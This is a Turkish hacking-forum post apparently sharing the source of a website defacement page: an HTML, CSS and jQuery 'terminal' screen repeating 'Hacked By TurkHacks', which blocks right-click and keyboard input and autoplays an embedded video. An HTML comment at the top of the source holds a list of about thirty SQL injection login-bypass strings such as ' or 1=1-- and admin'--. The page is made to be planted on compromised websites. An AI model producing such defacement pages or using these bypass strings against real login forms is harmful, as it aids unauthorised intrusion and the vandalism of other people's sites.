Hoşgeldin Misafir

THS Root Terminal İndex | JR ÇILDIRDI

jrCoder

25 Eyl 2017
425 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
6KYlpa.png


DEMO
http://turkteam.tk/demo/terminal.html


Source-


Kod:
<!-- 
JR CODER LANNNNNNNNNNNNNNNNN 
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
-->
<html>
<head>
<title>JR İS BACK | HACKED BY TURKHACKS.COM</title>
  <script src="http://code.jquery.com/jquery-latest.js"></script>
  <script src="http://jquery.thewikies.com/browser/jquery.browser.js"></script>
  <style>
  /*----JR CODER ULAN BU---*/
@import url(http://fonts.googleapis.com/css?family=Cantarell:700|Open+Sans:300&subset=cyrillic-ext);

body {
	background: gray;
	  overflow: hidden;
	
	
}
#terminal-window{
  width: 98%;
  margin-top:40px;
  margin-left: auto;
  margin-right: auto;
  margin-bottom: 40px;
  min-width: 500px;
  background: #fff;
  border-radius: 5px;
 
    box-shadow: 0px 0px 20px rgb(255, 0, 0);
  -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
  /*-webkit-transition:all 0.5s;*/
  overflow: hidden;
}

#terminal-toolbar{
  width: 100%;
  height: 25px;
  background: gray;
  border-radius: 5px 5px 0 0;

  background: #cfcfcf; /* Old browsers */
  background: -moz-linear-gradient(top,  #2f2e2b 0%, #3c3b37 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#d40000), color-stop(100%,#3c3b37)); /* Chrome,Safari4+ */
  background: webkit-linear-gradient(top, #d40000 0%,#3c3b37 100%);
  background: -o-linear-gradient(top, #d40000 0%,#3c3b37 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #2f2e2b 0%,#3c3b37 100%); /* IE10+ */
  background: linear-gradient(top,  #2f2e2b 0%,#3c3b37 100%); /* W3C */
  
  -webkit-box-shadow: 0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
  -moz-box-shadow: 0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
  box-shadow: 0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
}

#terminal-toolbar #terminal-buttons{
  float: right;
  position: relative;
  top: 4px;
  right: 10px;
}

.terminal-button{
  float: right;
  width: 14px;
  height: 14px;
  border-radius: 14px;
  -webkit-box-shadow: 0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
  -moz-box-shadow: 0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
  box-shadow: 0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
  overflow: hidden;
}

#terminal-buttons:hover .glyph{
  opacity: 1;
  cursor: default;
}

.terminal-close{
  background: #f41b16; /* Old browsers */
  margin: 0px 0px;
  position: relative;
  right: 0px;
}

.terminal-close-icon{
  position: relative;
  font-size: 8px;
  font-weight: bold;
  color: #333;
  font-family: 'Cantarell', sans-serif;
  margin: 2px 0 0 4px;
}

#terminal-title{
  float: left;
  position: relative;
  top: 6px;
  width: 40%;
  left: 40%;
  font-family: 'Cantarell', sans-serif;
  font-size: 14px;
  font-weight: bold;
  color: #d5dfdf;
  line-height: 14px;
}

#terminal-body {
  font-family: monospace; line-height: 1em;
  font-size: 11px;
  float: left;
  width: 100%;
  min-height: 30px;
  background-color: #000;
  padding: 10px;
  line-height: 1.5em;
}


#terminal-body p { color: gray!important; 
background: url(https://resmim.net/f/swuKuc.jpg) center fixed #000;
}

#terminal-body p::-moz-selection { background: #0b209e; }

#terminal-body root { color: red!important; }

#terminal-body user { color: lime!important; }

#terminal-body p {
  margin-top: 5px;
  margin-bottom: 5px;
}


@keyframes blink
{
  0%   { background:rgba(99,222,0,100); }
  100% { background:rgba(99,222,0,0); }
}

@-webkit-keyframes blink {
  0%   { background:rgba(99,222,0,100); }
  100% { background:rgba(99,222,0,0); }
}
@-moz-keyframes blink {
  0%   { background:rgba(99,222,0,100); }
  100% { background:rgba(99,222,0,0); }
}


img {
	
	position: absolute;
	top: 45%;
	left: 20%;
	overflow: hidden;
	 opacity: 0.3;
}
  
  </style>
</head>
<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onselectstart="return false" ondragstart="return false">
<embed width="0" height="0"
src="https://www.youtube.com/v/yHuLdRawmEg?autoplay=1">

<div class="cssterm">
$ jrcoder is back 
Linux ThinkPad-X230.localdomain 3.9.6-301.fc19.x86_64 #1 SMP Mon Jun 17 14:26:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

# dmesg | grep sd
[135587.413741] sd 27:0:0:0: Attached scsi generic sg1 type 0
[135587.416697] sd 27:0:0:0: [sdb] 2007040 512-byte logical blocks: (1.02 GB/980 MiB)
[135587.418130] sd 27:0:0:0: [sdb] Write Protect is off
[135587.418140] sd 27:0:0:0: [sdb] Mode Sense: 03 00 00 00
[135587.418944] sd 27:0:0:0: [sdb] No Caching mode page present
[135587.418947] sd 27:0:0:0: [sdb] Assuming drive cache: write through
[135587.423205] sd 27:0:0:0: [sdb] No Caching mode page present
[135587.423211] sd 27:0:0:0: [sdb] Assuming drive cache: write through
[135587.424119]  sdb: sdb1 sdb2
[135587.428088] sd 27:0:0:0: [sdb] No Caching mode page present
[135587.428094] sd 27:0:0:0: [sdb] Assuming drive cache: write through
[135587.428098] sd 27:0:0:0: [sdb] Attached SCSI removable disk
[135588.336077] SELinux: initialized (dev sdb1, type iso9660), uses genfs_contexts

#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks
#Hacked By TurkHacks
$Hacked By TurkHacks

</div>
<script>
$(document).ready(function() {

  // Better performance in replacing js in any browsers. http://jsperf.com/encode-html-entities
  if($.browser.name != "XXXXXXXXTURKHACKS") {
    var tagsToReplace = {
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      ' ': '&nbsp;',
      '#': '<root>[root@turkcoder]# </root>',
      '$': '<user>[user@jrcoder]$ </user>'
    };
    function replaceTag(tag) {
      return tagsToReplace[tag] || tag;
    }
    function htmlEscape(str) {
      return str.replace(/[&<> ]/g, replaceTag);
    }
    function userReplace(str) {
      return str.replace(/^[#$]/gi, replaceTag);
    }
  } else {
    function htmlEscape(str) {
      return str.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/ /g, '&nbsp');
    }
    function userReplace(str) {
      return str.replace(/^#/gi, '<root>[root@jrcoder]# </root>').replace(/^\$/gi, '<user>[user@turkcoder]$ </user>');
    }
  }

  // the html that will be inserted to replace the shortened code
  // the terminal bar and body before the text is placed
	var termTop = '\
	<div id="terminal-window"> \
 	<div id="terminal-toolbar"> \
		<div class="terminal-top"> \
				<div class="terminal-menu"> \
				</div> \
			<div id="terminal-buttons"> \
				<div class="terminal-button terminal-close"> \
				<div class="terminal-close-icon">X</div> \
				</div> \
			</div> \
			<div id="terminal-title"> \
				[email protected]:~ | We Are Legends \
			</div> \
		</div> \
	</div> \
	<div id="terminal-body"><p>\
	<img src="https://resmim.net/f/l2RbBX.png"> <br>\
';

	// closes the html that has been inserted, ends the terminal display
	var termBot = '\
	</p> \
	</div> \
</div> \
';

  // tell jQuery to search for each instance of the shortened code
  $(".cssterm").each(function() {
    var myContent = $(this).text();
    var arrayContent = myContent.split('\n');
    var newString = "";
    jQuery.each(arrayContent, function() {
      // make sure there's text to avoid blank spaces
      if (this.length != 0) {
        // is string a root command
        if (this.charAt(0) == "#" || this.charAt(0) == "$") {
          newString += userReplace(this) + "<br>\n";
        } else {
          newString += htmlEscape(this) + "<br>\n";
      }
    }
  });
  $(this).replaceWith( termTop + newString + termBot );
  });
});

</script>
</body>
</html>